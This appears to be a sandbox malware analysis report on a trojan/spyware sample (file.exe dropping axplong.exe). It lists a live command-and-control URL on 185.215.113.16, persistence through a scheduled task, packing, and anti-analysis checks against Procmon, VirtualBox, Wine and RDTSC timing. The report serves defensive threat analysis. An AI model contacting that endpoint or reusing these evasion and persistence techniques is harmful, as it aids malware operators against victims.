                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2h
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3i
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpBi
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpL
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpPh
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQi
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiP
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpoh
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpsK

                  System Summary

                  barindex
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_002630685_2_00263068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00224CF05_2_00224CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00257D835_2_00257D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0026765B5_2_0026765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00224AF05_2_00224AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_002687205_2_00268720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00266F095_2_00266F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0026777B5_2_0026777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00262BD05_2_00262BD0
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973018136920981
                  Source: file.exeStatic PE information: Section: qvaauuzo ZLIB complexity 0.9943085325836659
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973018136920981
                  Source: axplong.exe.0.drStatic PE information: Section: qvaauuzo ZLIB complexity 0.9943085325836659
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1870848 > 1048576
                  Source: file.exeStatic PE information: Raw size of qvaauuzo is bigger than: 0x100000 < 0x197200

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 5.2.axplong.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1cacdf should be: 0x1d59e3
                  Source: file.exeStatic PE information: real checksum: 0x1cacdf should be: 0x1d59e3
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: qvaauuzo
                  Source: file.exeStatic PE information: section name: ezuxwngn
                  Source: file.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: qvaauuzo
                  Source: axplong.exe.0.drStatic PE information: section name: ezuxwngn
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0023D84C push ecx; ret 5_2_0023D85F
                  Source: file.exeStatic PE information: section name: entropy: 7.983537671384169
                  Source: file.exeStatic PE information: section name: qvaauuzo entropy: 7.953327173780446
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.983537671384169
                  Source: axplong.exe.0.drStatic PE information: section name: qvaauuzo entropy: 7.953327173780446
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E8CC second address: F5E8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E8D4 second address: F5E8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E8D8 second address: F5E909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 jmp 00007F4FE9502C61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E909 second address: F5E918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jc 00007F4FE915D6ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5DB7E second address: F5DBA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C69h 0x00000009 jbe 00007F4FE9502C56h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5DBA1 second address: F5DBD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B0h 0x00000007 jmp 00007F4FE915D6B8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5DD65 second address: F5DD6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E012 second address: F5E01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE915D6A6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E01C second address: F5E03E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FB84 second address: F5FBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6B3h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FBA3 second address: F5FBA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FBA9 second address: F5FBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FBAF second address: F5FBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FEFE second address: F5FF1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6B0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FF1C second address: F5FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E255 second address: F7E259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E259 second address: F7E25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E3BF second address: F7E3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E65E second address: F7E67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 jo 00007F4FE9502C56h 0x0000000d pop edx 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E67F second address: F7E6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E6A2 second address: F7E6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E7FD second address: F7E81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4FE915D6B4h 0x0000000b jo 00007F4FE915D6A6h 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E81E second address: F7E82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007F4FE9502C56h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E82A second address: F7E82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E82E second address: F7E83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4FE9502C62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E83C second address: F7E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E842 second address: F7E862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FE9502C63h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E862 second address: F7E866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EC45 second address: F7EC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EC49 second address: F7EC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FB04 second address: F7FB0E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FE9502C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FD9A second address: F7FD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FD9E second address: F7FDA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDA2 second address: F7FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4FE915D6B3h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4FE915D6B4h 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDD5 second address: F7FDE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F4FE9502C56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDE0 second address: F7FDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDE9 second address: F7FDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
